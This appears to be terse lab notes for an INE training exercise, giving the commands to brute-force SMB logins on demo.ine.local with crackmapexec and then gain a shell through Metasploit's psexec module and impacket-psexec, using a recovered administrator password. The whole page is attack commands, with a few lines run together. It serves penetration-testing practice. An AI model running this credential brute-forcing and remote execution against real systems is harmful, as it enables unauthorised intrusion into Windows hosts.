Windows: SMB Server PSexec
Last updated
Last updated
crackmapexec smb demo.ine.local -u /usr/share/wordlists/metasploit/common_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"msfconsole -q
use exploit/windows/smb/psexec
set rhosts demo.ine.local
set smbuser administrator
set smbpass qwertyuiop
runimpacket-psexec EC2AMAZ-408S766/administrator:qwertyuiop@demo.ine.local